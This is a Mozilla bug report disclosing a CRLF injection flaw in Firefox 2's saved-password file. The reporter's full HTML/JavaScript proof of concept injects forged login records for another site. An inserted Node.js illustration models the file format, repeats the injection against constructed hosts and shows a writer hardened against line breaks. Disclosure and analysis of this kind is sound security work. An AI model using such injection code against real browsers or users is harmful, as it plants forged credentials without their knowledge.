Closed Bug 400600 Opened 17 years ago Closed 17 years ago

Injecting login/password information

Categories

(Toolkit :: Password Manager, defect)

x86
Windows XP
defect
Not set
normal


RESOLVED DUPLICATE of bug 394610

People

(Reporter: tyter9, Unassigned)

(Whiteboard: [sg:dupe 394610])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8

1. Overview

FF stores saved login/password information in the 'signons2.txt' file in the following format:

#2d
reject domain 1
reject domain 2
...
reject domain n
.
domain
user_field
user_value
pass_field
pass_value
action_domain
.
etc...

user_field and pass_field are the names of the login and password input tags. These values are put into the file without any filtering, so it's possible to manipulate the contents of that file by injecting new line chars ('\r\n', tested on Windows XP SP2). I know it isn't a critical issue, but it's a curious feature :).

2. Proof of Concept

Below is the PoC code; it injects login/password information. The script works ONLY remotely. For testing, make the following steps:

* fill in the values of the record to inject (host, input tag names, login and password)
* click 'Inject Record'
* fill in the login/password fields
* click 'Log in'
* answer 'yes' to the question about saving login/password information
* reset FF

After that you should see two new records in the password manager, one of them unexpected :)

--- CUT-----
<html>
<head>
<title>FF Password Injector</title>
<script>
// Base64 code from Tyler Akins -- http://rumkin.com
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

function encode64(input) {
  var output = "";
  var chr1, chr2, chr3;
  var enc1, enc2, enc3, enc4;
  var i = 0;

  do {
    chr1 = input.charCodeAt(i++);
    chr2 = input.charCodeAt(i++);
    chr3 = input.charCodeAt(i++);

    enc1 = chr1 >> 2;
    enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
    enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
    enc4 = chr3 & 63;

    // charCodeAt() past the end of the input returns NaN: pad with '='
    if (isNaN(chr2)) {
      enc3 = enc4 = 64;
    } else if (isNaN(chr3)) {
      enc4 = 64;
    }

    output = output +
      keyStr.charAt(enc1) + keyStr.charAt(enc2) +
      keyStr.charAt(enc3) + keyStr.charAt(enc4);
  } while (i < input.length);

  return output;
}

// Build a signons2.txt fragment and set it as the name of form2's login
// field; the '\r\n' sequences in the name reach the file unfiltered when
// the password manager saves the logon.
function changeInputName() {
  var $injectHost = document.form1.host.value;
  var $injectUserName = document.form1.user_name.value;
  var $injectPassName = document.form1.login_name.value;
  var $injectUserValue = encode64(document.form1.user_value.value);
  var $injectPassValue = encode64(document.form1.login_value.value);
  var $selfHost = location.protocol + "//" + location.hostname;

  var $name =
    "\r\n" + "\r\n" + "\r\n" + "\r\n" +
    $selfHost + "\r\n" +
    ".\r\n" +                            // begin of the new record
    $injectHost + "\r\n" +
    $injectUserName + "\r\n" +
    "~" + $injectUserValue + "\r\n" +    // '~' prefixes a base64-encoded value
    "*" + $injectPassName + "\r\n" +     // '*' prefixes the password field name
    "~" + $injectPassValue + "\r\n" +
    $injectHost + "\r\n" +
    ".\r\n" +                            // end
    $selfHost + "\r\n" +
    "login";

  document.form2.login.name = $name;
}
</script>
</head>
<body>
<form name="form1">
  Host:<br>
  <input type="text" name="host"><br>
  User field name:<br>
  <input type="text" name="user_name"><br>
  Login field name:<br>
  <input type="text" name="login_name"><br>
  Login:<br>
  <input type="text" name="user_value"><br>
  Password:<br>
  <input type="text" name="login_value"><br>
  <input type="button" value="Inject Record" onclick="changeInputName()">
</form>
<br><br><br>
<form method="post" name="form2">
  <input type="text" name="login"><br>
  <input type="password" name="pass"><br>
  <input type="submit" value="Log in">
</form>
</body>
</html>
---CUT------

Regards,
Dariusz Tytko

Reproducible: Always

Steps to Reproduce:
1.
2.
3.
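As an added illustration (this is editor-written example code, not the reporter's PoC and not Firefox's password manager), the following models the signons2.txt layout the report describes with a small writer and parser and shows why an unfiltered line break in an input name matters: one saved logon for the attacker's host is parsed back as three records, one of them for a host the user never logged in to. A hardened writer that refuses field names containing CR or LF is shown beside the naive one. Assumptions not stated in the report: values are stored as "~" followed by base64 of the plaintext, the last line of a record before "." is the action host, and all hosts, field names and credentials below are constructed.

```javascript
// Model of the signons2.txt layout described in the bug report (constructed
// example; not Firefox code). Header, reject list, ".", then per record:
//   host, <field name>, ~base64(value), *<password field>, ~base64(value), action host, "."
const HEADER = '#2d';
const b64 = (s) => Buffer.from(s, 'utf8').toString('base64');
const unb64 = (s) => Buffer.from(s, 'base64').toString('utf8');

// Naive writer: field names are written unfiltered, as the report says.
function writeRecordNaive(rec) {
  return [
    rec.host,
    rec.userField, '~' + b64(rec.userValue),
    '*' + rec.passField, '~' + b64(rec.passValue),
    rec.actionHost,
    '.',
  ].join('\r\n') + '\r\n';
}

// Hardened writer: a line break inside a host or field name would change the
// file structure, so refuse to store such a record at all.
function assertNoLineBreak(label, s) {
  if (/[\r\n]/.test(s)) throw new Error(label + ' contains a line break');
}
function writeRecordSafe(rec) {
  for (const k of ['host', 'userField', 'passField', 'actionHost']) assertNoLineBreak(k, rec[k]);
  return writeRecordNaive(rec);
}

function writeFile(rejects, records, writeRecord) {
  return [HEADER, ...rejects, '.'].join('\r\n') + '\r\n' + records.map(writeRecord).join('');
}

// Parser: header, reject hosts up to ".", then records each terminated by ".".
// Within a record, lines come in name/value pairs; a name starting with "*"
// is the password field; the line just before "." is the action host.
function parseFile(text) {
  const lines = text.split(/\r?\n/);
  if (lines[0] !== HEADER) throw new Error('unexpected header ' + lines[0]);
  let i = 1;
  const rejects = [];
  while (i < lines.length && lines[i] !== '.') rejects.push(lines[i++]);
  i++; // skip "."
  const records = [];
  while (i < lines.length && lines[i] !== '') {
    const host = lines[i++];
    const body = [];
    while (i < lines.length && lines[i] !== '.') body.push(lines[i++]);
    i++; // skip "."
    const actionHost = body.pop();
    const rec = { host, actionHost, userField: '', userValue: '', passField: '', passValue: '' };
    for (let j = 0; j + 1 < body.length; j += 2) {
      const name = body[j];
      const raw = body[j + 1];
      const value = raw.startsWith('~') ? unb64(raw.slice(1)) : raw;
      if (name.startsWith('*')) { rec.passField = name.slice(1); rec.passValue = value; }
      else { rec.userField = name; rec.userValue = value; }
    }
    records.push(rec);
  }
  return { rejects, records };
}

// The input name an attacker page would give its login field: it closes the
// record being written, inserts a complete record for another host, then
// reopens a record so the genuine lines that follow still parse.
function injectedFieldName(selfHost, inj) {
  return [
    'login', '~', '*pass', '~', selfHost, '.',
    inj.host, inj.userField, '~' + b64(inj.userValue),
    '*' + inj.passField, '~' + b64(inj.passValue), inj.host, '.',
    selfHost, 'login',
  ].join('\r\n');
}

// Save ONE logon for the attacker's host with the naive writer and parse the
// file back; then try the same record with the hardened writer.
function demo() {
  const selfHost = 'http://attacker.example'; // constructed
  const inj = { host: 'http://bank.example', userField: 'uid', userValue: 'victim',
                passField: 'pw', passValue: 'hunter2', actionHost: 'http://bank.example' };
  const saved = { host: selfHost, userField: injectedFieldName(selfHost, inj),
                  userValue: 'alice', passField: 'pass', passValue: 'secret', actionHost: selfHost };
  const naive = parseFile(writeFile(['http://reject.example'], [saved], writeRecordNaive));
  let safeError = null;
  try { writeFile([], [saved], writeRecordSafe); } catch (e) { safeError = e.message; }
  return { naiveRecords: naive.records, safeError };
}

module.exports = { writeRecordNaive, writeRecordSafe, writeFile, parseFile, injectedFieldName, demo };
```

Running demo() under Node.js shows three parsed records from the single saved logon: a harmless one for the attacker's host, the injected bank.example record carrying the attacker-chosen credentials, and the real one, while the hardened writer rejects the record before anything is written. The fix is on the writer side because the parser cannot tell an injected record from a legitimate one once the line breaks are in the file.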
Thanks for reporting this; as it turns out, this bug's already under investigation in bug 394610, so I'm marking this bug as a duplicate of it. Feel free to try breaking any patches posted there, either in a home-grown build or in builds created after patches there land.
Status: UNCONFIRMED → RESOLVED
Closed: 17 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 394610]
Product: Firefox → Toolkit
Group: core-security